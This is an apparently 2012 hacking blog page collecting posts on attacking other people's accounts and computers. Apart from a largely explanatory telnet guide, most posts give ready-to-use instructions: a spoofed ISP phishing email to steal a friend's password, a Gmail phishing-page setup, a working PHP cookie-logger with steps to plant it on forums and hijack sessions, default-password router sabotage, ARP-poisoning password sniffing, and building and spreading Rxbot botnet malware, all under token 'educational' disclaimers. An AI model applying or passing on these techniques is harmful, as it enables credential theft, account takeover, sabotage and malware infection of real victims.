Recent Posts


Welcome To My Blog

Hello Guys,I am Bassel and I welcome you to my blog.

This Group is made for those People who want to learn more about computers

This blog provides you with free Tips and Tricks about Computer and teacher you how you could save yourself from hacking.

Knowledge is For Sharing.

Remember Guys...This Group doesn't encourage you to do hacking.Legally,Hacking is a Crime and a Hacker is a Criminal.Everything I teach You here is for Knowledge Pupose.

Solutions to your Problems

Anyone can ask Me about problems of their Computers and I'll Help you with that.

Follow Me Please!

If You like the Tricks and Posts in this blog you can Follow it too.

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Friday, March 9, 2012

USB Stealer.

Written By Kanishk Singh :


Note:I am Not Responsible for what thing you use this trick for.This is only for Educational Purpose.


Hello,

Now I am Going to Post on the topic USB Stealer.

What is a USB Stealer?

A USB Stealer is a Software which can Collect the Passwords Stored on a computer very easily.There are Two Main Types of USB Stealer.

1. Internet Browser Password Stealer.

2. Windows Administrator Password Stealer.

This Time we'll learn about Internet Browser Password Stealer.

This one can Tell you the passwords of any of the following Messengers and Internet Browsers-

1. Internet Explorer.

2. Google Chrome.

3. Opera Browser.

4. Outlook Mail.

5. Mozilla Firefox.

6. Hotmail Messenger.

To Download This Just Click Here.


Now Just Double Click on the .RAR file and Click on Extract Button. A dialogue box will open asking for password.Just type this is the password feild->

velocity

If It fails to Extract the file,then you need to Disable your Anti-Virus only for sometime(until you are done getting the password.)

If You don't know how to Disable your Anti-Virus,just Google it like

How to Disable your anti-virus.

Now Enjoy this Software for free!!



HAPPY HACKING!!!





Special Credits To Kanishk Singh

Thursday, March 1, 2012

Telnet: the Number One Hacker Tool


In this Guide you will learn:

· What is telnet?

· How to telnet

· How to get telnet accounts

· Why you might not want to telnet

· How to install a telnet server on your home Windows computer

· How to turn off a telnet server on your home Linux computer

· How to explore computers using telnet

· Why not use a portscanner instead?

· How to break into web sites using telnet

"Where do I type that command?" People ask that all the time when they read my early Guides to (mostly) Harmless Hacking. I wrote those guides back when the Internet was in its infancy and almost everyone in cyberspace used telnet. However, nowadays you might never even hear about telnet, much less use it, unless you are a hacker. So if you are still wondering about telnet, today is your lucky day.

What Is Telnet?

Telnet is a protocol that is most commonly used to log into a remote computer. It also is the single most powerful hacking tool on the planet. With just a telnet client program, you can:

· send email

· download source code from web sites

· send unexpected input to webservers that can give you amazing and sometimes illegal results

· give arbitrary input to many other services on Internet host computers

· probe the services offered by servers, routers and even people's home computers.

How to Telnet

Don't know how to telnet? Click the easy telnet links at happyhacker.com and land in the middle of a real hacker wargame! This should work regardless of your computer operating system -- if you have an up to date browser, if your online service provider gives you a true Internet connection, and if your computer is able to telnet at all.

Did those links get you into a telnet session? Were you able to login to a remote computer? If yes, congratulations.

If not, how can you fix the problem? If no telnet program appeared on your monitor when you clicked these links, perhaps your browser is too ancient to allow telnet. Try installing the latest Netscape browser (). Or, perhaps your operating system does not include a telnet program. In that case, install or reinstall Windows 95 or 98. If you own a Mac, get the superb Mac OS X or Linux PPC ().

If a telnet program came up and failed to connect, possibly the computer you were trying to telnet into was down or just plain no longer in existence. Or, you may be using America Online (or a similar extremely poor online service). If so, your simplest solution may be to get a better online service provider. Determined to hack using AOL? See http://happyhacker.org/aol.shtml <../aol.shtml> for some ways to make AOL give you a true Internet connection.

OK, so you've managed to telnet for the first time. Presumably you don't want to limit yourself to telnet links on web sites. How do you telnet anywhere you want to go?

If you have Linux or any other type of Unix (BSD, SCO, Solaris, Sun OS, Irix, Ultrix, etc.) telneting is easy. Just bring up "console" or "shell" (or whatever your GUI calls the command line interface). At the prompt type:

telnet

More on Telnet: the Number One Hacker Tool

Windows 2000 works pretty much like Unix. See Figure 1 for an example of a Win 2000 telnet login. Not shown on the screen was the command "telnet 10.0.0.10", which I gave at the Command (MS-DOS) prompt.

Figure 1: Telnet using Windows 2000

If you have Windows 95, 98 or NT, to telnet, bring up the MS-DOS prompt (Start --> Programs --> MS-DOS).

Click "connect" then "remote system…". In the host name box place the host name or IP address of the computer to which you wish to telnet. Leave the Port and Term Type boxes alone for now.

Here is a really important point. Every day people email me complaining that some computer won't let them telnet into it. They ask what they are doing wrong. They aren't doing anything wrong:

· Maybe the computer they are trying to reach no longer exists.

· Maybe the computer they are trying to reach doesn't allow telnet logins. For example, whois.internic.net no longer allows telnet logins on port 23 (the default port). Click here to learn how to telnet into whois.internic.net on the right port for that particular server. <../whois.shtml>

· Maybe a firewall is blocking them.

· Or maybe they make a telnet connection and the remote computer asks for a user name and password they don't have. Then they email me asking for how to get a login name and password that will work.

Newbie note: The owners or administrators of any Internet host computer decide who gets user names and passwords. Believe it or not, about once a week someone emails me asking what user name and password their own online service provider has assigned them for a telnet login. That's why I'm telling people the obvious -- if you want to telnet into any computer, and you don't have a user name and password, you must ask the owner, administrator of tech support for that system for a user name and password. If they won't give that to you, they don't want you to have it!

You can go to jail warning: If you guess the user name and password, or use a computer breakin technique to get or create them, or if someone other than an owner or administrator or a legitimate user on that system gives you a user name and password, it is against the law to use them. Many computer criminals give out user names and passwords that they obtained illegally.

More on Telnet: the Number One Hacker Tool

How to Get Telnet Accounts

OK, so you want to get legal user names and passwords so you can telnet into other computers. Here are some of the best ways:

· See http://happyhacker.org/links2.shtml#shells <../links2.shtml> for organizations that will give you free shell accounts. You can telnet into these.

· Ask Internet Service Providers for shell accounts. Some offer them, although most don't.

· Set up a telnet server on your own computer (see instructions below). Yes, once you are running a telnet server, you can telnet from your computer back into your computer. Simply give the command "telnet 127.0.0.1".

· Make friends with people who run Internet computers with telnet servers.

Why you May Not Want to Telnet

If you love your shell account server, don't ever, ever telnet or ftp into it. I recommend Ssh or Openssh for logging into remote computers? The telnet (and ftp) protocol is a "clear text" transmission. That means that computer on the same LAN as either You or your destination computer, or any computer on any LAN or network path through which your connection passes can steal your login name, password or anything else that goes across your connection. Ssh and OpenSsh encrypt all communications so no one can snoop on you.

How to Install a Telnet Server on your Windows Computer

Usually you can't telnet into a Windows home computer. The reason is, they aren't running telnet servers. Here's how to get a telnet server on your home Windows computers so your friends and you can telnet in and play.

For Windows NT, the Options Pack includes a primitive telnet server.

For Windows 95/98/NT and 2000, you also can install shareware or commercial telnet servers. Check out http://www.winfiles.com, or do a web search.

Of course installing a telnet server makes your computer vulnerable to all sorts of trouble from hackers. It's your funeral, don't come crying top me if a telnet visitor destroys your computer

More on Telnet: the Number One Hacker Tool

How to Turn off a Telnet Server on your Unix-type Computer

If you go online with Linux or other Unix-type computer, a telnet server is the easiest way to ensure you get destroyed by a malicious hacker. Here's how to prevent this. On most of these, the file /etc/inetd.conf launches most of your servers. Edit the file to put a "#" in front of the line that has telnet in it and either reboot your computer or kill and restart inetd.

If your computer doesn't use inetd to launch services, you should be able to find telnetd under /etc/init.d.

Install ssh instead and only use that to log into your shell account.

How to Explore Computers Using Telnet

Even if a computer doesn't have a telnet server, there are lots of fun and even legal things to do to it using telnet. The easiest thing to do is extract "banners" from a victim computer. A banner is a message a computer will often give when you telnet to a port that is running an Internet server of some sort.

For example, most mail sending servers use port 25. To telnet to port 25 from Win 2000 or a Unix shell, simply type:

telnet 25

Windows 95, 98 and NT make it a tiny bit harder.

More on Telnet: the Number One Hacker Tool

If the victim computer is running a mail server, you will see something that looks like this:

Whoa, look at that! The victim computer told us what operating system (Windows NT) and mail server (Mercur) it runs!

A quick search of the Bugtraq archives at revealed horrid things a criminal could do to that Mercur mail server. Since I think it is more fun to be nice, I told someone at the company using this mail server about the problems. He invited me to vacation at his beautiful Swiss home, where he and his wife keep horses and take long trail rides in the Alps. Golly, that is much more fun than breaking into a computer!

Right about now some elite ueberhaxorz are probably reading this and saying "What a lamer Meinel is! We can do the same thing by running nmap."

They are right, you can learn the same things by running a port scanning program such as nmap (available at ). However, I am quite careful about under what circumstances I run any port scanner. In order to get information on what programs are running on what ports, you must run a port scanner in a mode that will probably convince the owner of the victim computer that you are a criminal. He or she may persuade your online service provider to cancel your account.

The other reason to analyze computers using telnet is that you learn more. It's the difference between eating at McDonalds and learning how to cook.

More on Telnet: the Number One Hacker Tool

A quick search of the Bugtraq archives at revealed horrid things a criminal could do to that Mercur mail server. Since I think it is more fun to be nice, I told someone at the company using this mail server about the problems. He invited me to vacation at his beautiful Swiss home, where he and his wife keep horses and take long trail rides in the Alps. Golly, that is much more fun than breaking into a computer!

Right about now some elite ueberhaxorz are probably reading this and saying "What a lamer Meinel is! We can do the same thing by running nmap."

They are right, you can learn the same things by running a port scanning program such as nmap (available at ). However, I am quite careful about under what circumstances I run any port scanner. In order to get information on what programs are running on what ports, you must run a port scanner in a mode that will probably convince the owner of the victim computer that you are a criminal. He or she may persuade your online service provider to cancel your account.

The other reason to analyze computers using telnet is that you learn more. It's the difference between eating at McDonalds and learning how to cook.

How to Break into Web Sites Using Telnet

You don't have to use a web browser to access files on a web site. All you need to do is:

telnet 80

Or specify port 80 in a Windows telnet.

If you are using Windows 95/98/NT, whenever you are NOT logging into a telnet account, you should enable local echo. Otherwise whatever you type in (unless you are in a telnet account) will not show on the screen. To enable local echo, click Terminal --> Preferences --> Local Echo.

So how do you send stuff back to the webserver? Try this:

GET / HTTP/1.0

What kinds of commands can you send? The book Hackproofing Your Network <../bookstore/general.shtml> (by Ryan Russell of Securityfocus.com and Stance Cunningham) suggests a fun and harmless hack. Create and store a bogus cookie in the location on your web browser that stores cookies. (Find it by searching for the file "cookies.txt".) Name your bogus cookie something like "MyBogusCookie." Then telnet to the victim webserver and give something like this command:

GET / HTTP/1.0
User-Agent: HaveABogusCookieThisIsAJoke 123.4
Cookie: /; MyBogusCookie

The Ăśberhacker! -- How to Break into Computers <../uberhacker/index.shtml> book details a number of serious attacks you can perform through sending funny input to a webserver. Basically, you need to learn how to write shell programs, and then find ways to get them to be run by the webserver. I'm not going to explain them here, however. These attacks, when carried out against a vulnerable webserver, are so easy that little kids could do them, and I don't want to be responsible for their behavior. It's much harder for little kids to get a hold of Russell's and my books than it is for them to read this GTMHH on the Happy Hacker website.

So are you dying to know what to send a webserver in order to break into it, without having to buy a book? Here are some hints. How to do this will depend on what webserver it is, what operating system it runs on, whether its security weaknesses have been fixed, and whether the web designer has used things such as Common Gateway Interface (CGI) or Server Side Includes (SSIs) that have weaknesses in them.

You will have to research these issues at Web sites that archive vulnerabilities and exploits such as and . You will need to study web site programming (HTML -- hypertext markup language, CGI and SSIs) and shell programming. You will need to learn webserver commands (documented at ). You will have to use your brain and be persistent.

But at least if you come across a telnet exploit, now you know the answer to the question "where do I type that command?"

























frostwire, descargar ares, ares

How to Get someones ISP password.

1.) run your telnet program:
on windows , go to START -> RUN -> "TELNET".
on linux , you should open a shell , and write telnet.
2.) then connect (on windows "connect" , on linux "open") some anonymous server , if don't have any then search for one , if you are too lame then email me now! i'll give you in the minute! note: you should connect the server mail program (port "25")!
3.) now , write the following :

mail from:[**YOUR FRIEND'S ISP WEBMASTER**]
rcpt to:[**YOUR FRIEND'S EMAIL ADRESS**]
data
Hi there [YOUR FRIEND'S NAME] , this is [NAME OF YOUR FRIEND'S ISP] support team , lately , our server had some problems with the connection and the user-password files were destroyed , a backup was then released , and it was ok.
but yesterday we found out that it is not an updated version of the file , so , it will start charging you for a larger amount of money for each our you use!
- - - - - - - - - - - - - -
To correct the problem , we have made a speical program to correct the error , all YOU have to do is email :
"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" and in the SUBJECT write your "user name" and "password".

note: No moeny will be returned if you don't follow our instructions!

thank you,
the support team!

4.) press enter twice and then write "."(without the "") and press ENTER!

--
now , the places you saw ** say that maybe you didn't understood it all , so i'll give you a simple example .

[**YOUR FRIEND'S ISP WEBMASTER**] - example , if your friend is connected througe AOL , then type "webmaster@aol.com" , get it?

[**YOUR FRIEND'S EMAIL ADRESS**] - example , if your friend's email is john@aol.com, then type "john@aol.com".

[YOUR FRIEND'S NAME] - if your friend is called "John" then type "John".

[NAME OF YOUR FRIEND'S ISP] - if your friend is connected through AOL(American Online) , then type "American - Online"

"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" - this is the hard-part , but if you are reading this , then don't worry , you're one step from the end! ..

* launch your WWW browser(MICROSOFT INTERNET EXPLORER\NETSCAPE) , and type "HTTP://www.galaxycorp.com".

* Sign there for an account , now , when they ask you what username you want, then try the closest thing to your ISP name(ex - if your friend is connected thourgh American Online[AOL] then try "aol" or "a_o_l" or "american_online" !)

* and when they ask for your email , type your Real one!!!
now continue in your normal life , and remember to read your email!
if you suddenly get a message from your friend's email adress , and the subject is "john j4o87HnzG" then , guess what , you just saved 10$ a month!

Tuesday, February 28, 2012

How To Hack A Gmail Account Using Phishing Page By Dailyhackingtips | Hack Email Account Using Phisher


Hello To all friends previously i have posted How to hack twitter account using phishing page . today in this article i am going to show you how to hack a gmail account using the same method now i am sure you know what is phishing .



Also Read if anyone don't know What is phishing ?

So Guys follow the given below steps for hack gmail account.

1. First You need to download gmail phisher

Click Here For Download

2. Now You see download file contains-

Gmail.html
log.txt
mail.php


3. Now you upload all of the files in any free webhosting website like as
www.youfreehosting.net
www.esmartstart.com
www.110mb.com
www.ripway.com
www.ripway.com
www.t35.com

4. Once you have uploaded the files in the webhosting directoory , now send this phisher link (Gmail.Html) to your victiom and make him login to hig gmail account using send phisher.


5. once he or she logs in to his gmail account using phisher. all his typed gmail id and password is stored in log.txt

6. Now you open log.txt to get hacked gmail id and password as shown



That's it i think it's very simple method now you have victim gmail id and password hacked

If Anyone don't know that how it works ?

when a user types a user name password in the text box . the information is sent to login.php which acts as a password logger and redirects the page to loginframe2.htm which shows there has been a temporary error please try in it . so when the person clicks on try again option then it redirects to the actual url so that the victim does not know that yoursite is a fake site and gets his or her gmail.com password hacked . :)

If any one have any questions or suggestions then feel free to post a comments

And Don't forget to subscribe to ur feed :P


Note By Admin - This file and it's contents are only for educational purposes . please don't misuse them. the admin is not responsible in any way for your act . by using this you accept with the disclaimer

How To Hack any Account By CookieLogger | Create a CookieLogger and Hack any Account


Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a CookieLogger?
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …
Step 1: Save the notepad file from the link below and Rename it as Fun.gif:
Download it.
Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>
Step 3: Create a new Notepad File and Save it as logfile.txt
Step 4: Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
http://0fees.net
Step 5: Go to the victim forum and insert this code in the signature or a post :
Download it.
Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9
Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.
Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.
Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only
Enjoy !!

Monday, February 27, 2012

Accessing the Router


Your tricks and tweaks based on your experiences teaches you many thing,like the one I’m going to mention now

How to Access a router and what can you do after it ?
I’ve been doing this from past few months, and I when Manav said that it is a global problem, I feel to appreciate him for that.
Okei, so here we go,
There are actually two methods
  1. Manual (I love this)
  2. Remote (I still love this)
But before just illustrating the trick, I’d like to introduce some thing to you all. A router is a device that connects with the Lan Card/Ethernet or with the USB port of your computer, it is a gateway of your computer to the outside world.
It is assumed that with the introduction of router, direct access to your computer, which was possible in the Dial UP reign, is now abolished, but in this world nothing is safe, so we’ll see.
Manual Method
The Router and the computer make a small local Area Network.
There are different IP addresses for different devices/nodes in the LAN, normally the range starts from 192.168.1.1, you can check out your node’s IP, by viewing the properties of the Network Connection (if its connected).
Now, normally the router or the server (if in a larger network ), has the local IP 192.18.1.1. You can always access the configuration page, by visiting the local IP 192.168.1.1 , type this IP address on any web browser.
This will lead you to the configuration page, where it will ask you for the user name and password, see the snapshot
Accessing the configuration PHP page
Now, here lies the biggest flaw of the global aspect, try this useername : admin, password :: admin, try this it will workin 95% cases, why ?, because even the IT gurus are n00bs enough for never looking in this problem, Its a global situation, from Japan to Pakistan.
So here you are in the Configuration page , now even if the password is not admin, and you’ve physical access to the router, just reset it, all it need is a pin ;)
In the Remote Method, all you need to know is the IP of the router, no local IP won’t get you to anybody’s router, so you need to know the IP when he is connected, there are so many methods, I’ll have a separate post for that.
Now the Question lies, what Can I do for fun ?
The most obvious thing that you can do is “trouble him/her”, how ?, well just navigate through the configuration pages, to find something like “Internet Connection “, It list the connections, see the snapshot
Internet Connection Page
Now this is your work, out of the given list only one will be active, which one?, most probably the top one, edit it, change the VPI and VCI value, hola, you’re done, this trick will atleast trouble him for 2-3 days. And beside you can change many other things, that I leave on you ! :D
Changing VPI and VCI
In certain Router, it is even possible to get the username of the Internet Connection and the password of the connection in hidden form, but everybody knows that the password is there, and since you’ve access to the PHP page you can get the damn password out,for example see this snap
accessing the password
What else can I do ?, well I’ven’t tried it but lets see, the router and the computer interacts by using a port, which port ? , we don’t know, it can be any of those 65000 ports, so running a port scanner ( you’ll find many ) is an advisable thing, go ahead and let me know !

SEE ALL THE PASSWORDS AND TRAFFIC AND CHAT CONVERSATION IN UR LAN



Sniifing with Cain and Abel

What is Cain & Able ?
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. (taken from their website)

Download Link :- http://oxid.netsons.org/download/ca_setup.exe (sometimes the link doesn't work)

Softpedia link :- > here <

This tutorial is meant for sniffing only there are a lot other things you can do with cain as mentioned above

How to sniff with CAIN
Step 1:- Install Cain and Launch it

Step 2:- Click on Sniffer tab


Step 3:- Activate the sniffer by clicking 2nd icon (seems like micro chip -- tooltip says Start/Stop Sniffer) from the left on top bar

Step 4:- Click on blue coloured Plus icon to scan for MAC address on LAN or simply right click ->scan MAC address


Step 5:- Click OK on the next window that comes -> CAIN is told to scan all the host in our subnet


Step 6:- Click on APR tab at the bottom


Step 7: Now Click on the Plus sign again at the top to add Computers to sniff on . A windows will pop up . In that windows . Select the router/gateway of your lan on the left side and the computer you want to sniff on the right side. Mostly the gateway is the one with ending octet 1 eg. 10.10.10.1 or 10.129.71.1 as in my case. Ususally last no. is 1




Step 8:- Now you'll see the computers are added to the list. Click on 3rd icon from the left on the top which is like has a biohazard sign . You'll see something like this



Step 9:- Step back and relax and let cain do its work you'll see passwords rolling in passwords tab.(click it to enter password)

well its 3 in the morning and i don't think anyone else is online besides me so this picture does't show you any passwords


Suggestions and Feedbacks are appreciated

How To Create And Compile Botnets To Autohack 1000ds of Systems



 i found a nice tut that helps u with the basics of the botnets
In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:

Download
Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.

Q:What is a botnet?
A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".
Depending on the source you used, the bot can do several things.
I myself have helped write one of the most advanced and secure bot sources out there.
(Off topic)
But once again depending on the source you can :
Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".
Once again depending on the bot it may be able to kill other fellow competeter bots.
Or even kill AV/FW apon startup.
Add itself to registry.
Open sites.
Open commands.
Cmd,
notepad,
html,
Anything is possible !

Theres the infected computers "bots" the attacker, the server, and the victim.

Quote:
while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.

Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."


Botnets are being used for Google Adword click fraud, according to security watchers.

Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server. I will setup bots for people if they have something to offer.
---------------
Ignore anything about using the server editor but this tutorial show how to make an irc channel and spread bots:
Download tutorial

-----------------------------
Here we go ladies and gentlemen :)
Follow the tutorial:
-----------------------------

I. Setting up the C++ compilier: (easy)

1. Download Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)
Mirror 2
Mirror 3 Direct
Pass: itzforblitz
Serial: 812-2224558

2. Run setup.exe and install. Remember to input serial

3. Download and install the Service Pack 6 (60.8 mb)

4. After that Download and install:

Windows SDK (1.2 mb)
Mirror 2
Mirror 3
Pass: itzforblitz
-------------------------------------

II. Configuring the C++ compilier (easy)

1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)
Quote:
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB

4. Now put them in this order: (use up and down arrows)

Image
(it does not matter whats below those lines)
---------------------------------------

III. Configuring your bot: (easy)

1. Download and unpack:
Rxbot 7.6 (212.3 kb)
Mirror 2
Mirror 3

2. You should see an Rxbot 7.6 folder
3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:

Quote:
Put in quotations:
char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password

Optional:
char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass

-----------------------------------
IV. Building your bot: (very easy)

1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right Click "rBot Files" and click Build:
Image

5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!

YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !
-------------------------------------
Command list
Download Command list

Basics:
.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more
-----------------------------------
Download mIRC

mIRC
Mirror 2
Mirror 3
--------------------------------------------------------------------------------------------
How to secure your bots:

Don't be an ~censored~, it is easy to steal bots. All you need is the irc server address and maybe a key.
To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)
and update the channel topic and run:

The http://mybot.com is your bot's download link and the 82 can be any number(s)
Now steal their bots and have them join your channel ;)
To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.

To secure your self:

It is fairly easy to secure your bots, here is how:

1. When you are in your right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:

Image

This way no one besides you or another op can set the channel topic :)
Note: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.
------------------------------------------------------------------------
Good IRC Servers:

I would recommend running your botnet on a private server.
If you would like to setup a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he know that the IRC server is not doing anything illegal. If an Admin refuses, don't get angry. It is his/her server after all

 
Twitter Bird Gadget